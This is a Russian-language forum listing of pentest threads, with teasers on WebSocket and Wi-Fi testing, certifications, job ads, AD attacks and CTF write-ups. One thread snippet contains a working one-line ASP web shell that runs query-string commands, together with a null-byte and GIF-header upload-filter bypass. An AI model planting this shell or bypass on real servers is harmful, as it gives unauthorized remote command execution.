pentest

  1. CatWithBlueHat

    Статья WebSocket. Краткий экскурс в пентест ping-pong протокола

    "Краткость - сестра таланта" - именно так сказал Антон Павлович Чехов, и теперь говорю я. Сегодня, завтра и до конца дней площадки речь пойдет о WebSocket-ах: "Что это?", "Как работает?" и главное - "Как это взламывать?" (в целях этичного хакинга конечно). Начнем с простого и будем идти к...
  2. CatWithBlueHat

    На проверке Как стать гуру или WiFi Cheat Sheet

    Чтож, изначально, мне было страшно выкладывать сюда работы, которые я писал для маленького tg канал, но... Время пришло, пора и вам почитать тот ужас, что я пишу. А что мы знаем про пентест Wi-Fi? Кажется, что уже всё, но вот на offzone 2023 была представлена атака WPA‑E (Надеюсь, в скором...
  3. BearSec

    Статья OSCP умер?! Да здравствует PNPT?! (Отзыв о сертификации PNPT)

    Введение Всем привет. Весной этого года я успешно сдал экзамен и получил сертификацию PNPT. Изначально ваучер на сдачу данного сертификата я купил в начале лета 2021 года и предполагал, что буду первым, кто его сдаст из СНГ, но, в итоге, данный сертификат я сдал только в марте 2023 года, а пара...
  4. A

    Вакансия Вакансия Pentester | Penetration Testing Engineer (Санкт-Петербург)

    В компанию, которая оказывает услуги в сфере информационной безопасности: анализирует уровень защищенности ИТ-систем, проводит Pentest, подготовку к сертификации PCI DSS и не только, ищем Penetration Testing Engineer Чем предстоит заниматься: • анализ защищенности ИТ- инфраструктуры клиентов...
  5. C-Plus-Plus

    Как просканировать хост всеми скриптами nmap разом?

    Как просканировать хост всеми скриптами nmap на проверку уязвимостей разом, если так возможно?
  6. Mark Klintov

    Статья Злые устройства. Быстрый способ поиска и эксплуатации IoT уязвимостей

    Введение Давай вспомним, когда последний раз ты читал новости? Я думаю, что не так давно. А теперь подумай, когда весь мир мог прожить без единого масштабного взлома. Нас постоянно окружают гаджеты и умные девайсы и производители этих устройств не так часто заботятся о их безопасности. Кто-то...
  7. За кулисами Red Team

    За кулисами Red Team

    Мы пригласили экспертов информационной безопасности, которые поделятся опытом работы в Red Team и расскажут о самых интересных и необычных ситуациях, с которыми они сталкивались в проектах по тестированию на проникновение. Вы узнаете, как они решают проблемы и справляются с непредсказуемыми...
  8. Dzen

    Анонс 🔴 За кулисами Red Team. Интересные ситуации в проектах.

    Друзья, рады вам сообщить, что уже в эту субботу, 1 апреля, мы проведём наш первый стрим в этом году! Мы пригласили экспертов информационной безопасности, которые поделятся опытом работы в Red Team и расскажут о самых интересных и необычных ситуациях, с которыми они сталкивались в проектах по...
  9. J

    Я заказчик Ищу веб пентестера!

    Всем доброго времени суток! Требуется веб пентест личного ресурса. От вас крепкий скил, от нас хорошая оплата по результату пентеста. Пентест нужен с отчетом, не просто потыкать руками и прогнать сканером. Пентестить нужно сайт на пхп и вебсокетах Работа через любой уважаемый гарант сервис. В...
  10. Mark Klintov

    Статья Лаборатория в коробке. Создаем систему для пентестов

    Введение Многие люди очень часто любят путать пентест с обычной эксплуатацией уязвимостей. Давай я немного объясню. Само понятие теста на проникновения подразумевает использования всех аспектов и важных частей информационной безопасности. То есть перед тобой ставят компьютер с операционной...
  11. mcfly

    Видео bypass 802.1x

    EEE 802.1X ― это стандарт, который используется для аутентификации и авторизации пользователей и рабочих станций в сети передачи данных. Он осуществляет контроль доступа и не позволяет неавторизованным устройствам подключаться к локальной сети. Наибольшее распространение протокол получил в...
  12. mcfly

    Видео Acl атаки в Windows Aсtive Directory.

    Основные наборы привилегий, которые позволяют проводить атаки на AD.
  13. silero

    kali linux

    Хей, хочу поставить kali linux на внешний жесткий диск, возможно ли это? Как подключатся? И возможно ли сделать так: перед запуском пк подключаешь внешний жесткий диск, включаешь, и запускается kali. После работы выключаешь пк, отключаешь внешний жесткий диск, включаешь его и запускается винда...
  14. Sultan Mahmudov

    Вакансия Аудитор Pentest | Penetration Testing Engineer

    Мы — создатели одной из самых быстрых транспортно-логистических сетей в России и интернет-магазинов на собственной платформе. Это не стартапы — это продуктовая разработка в уже действующих проектах. Mag Development - аккредитованная IT-компания. Работать можно дистанционно или в одном из наших...
  15. szybnev

    Статья Скрываясь на виду у всех. №2

    Это вторая часть статьи о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. Первая часть здесь, она обязательна к прочтению! Я не буду углубляться в то, как работает стек, потому что я уже рассказал об этом в предыдущей статье...
  16. Frintezza

    Ошибка при загрузки оболочки asp

    Привет) пытаюсь загрузить оболочку но сервер выдает ошибку по началу сервер не давал закидавать .asp файл file.asp <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> потом я это обошел так: file.asp%00.jpg GIF89a; <%response.write...
  17. apache2

    Заметка Автоматизируем простые задачи на удалённой машине [Poor Man's Pentest]

    В этой статье я расскажу о том, как использовать и установить Poor Man's Pentest на примере создания полного интерактивного TTY шела (Fully Interactive TTY Shell) git clone https://github.com/JohnHammond/poor-mans-pentest.git cd poor-mans-pentest mkdir /opt/pmp cp functions.sh /opt/pmp/ Для...
  18. G

    CTF Проходим лёгкие комнаты TryHackMe #2

    Всем привет.В прошлой теме CTF - Проходим лёгкие комнаты TryHackMe я получил неплохую отдачу от вас и решил продолжить рассказывать про легкие комнаты THM.Я не буду расписывать моменты о которых уже говорил , буду стараться написать что-то уникальное , как минимум для меня:) Давайте начнем с...
  19. Demoness

    Pentest как научиться?

    Привет. Очень хотелось бы научитсья пентестингу и иметь такие знание. На форуме вижу много людей кто это знает и я думаю что, почему бы и нет. Как научиться? Что делать и как начать? Спасибо!
  20. Codeby News

    News 96% российских организаций не защищены от проникновения

    Positive Technologies опубликовала результаты пентестов за 2021-2022 годы. Во всех компаниях был взят полный контроль над инфраструктурой. В 9 из 10 случаев злоумышленник получал доступ к коммерческим тайнам. В тесте на кибербезопасность приняли участие 50 проектов из 30 российских организаций...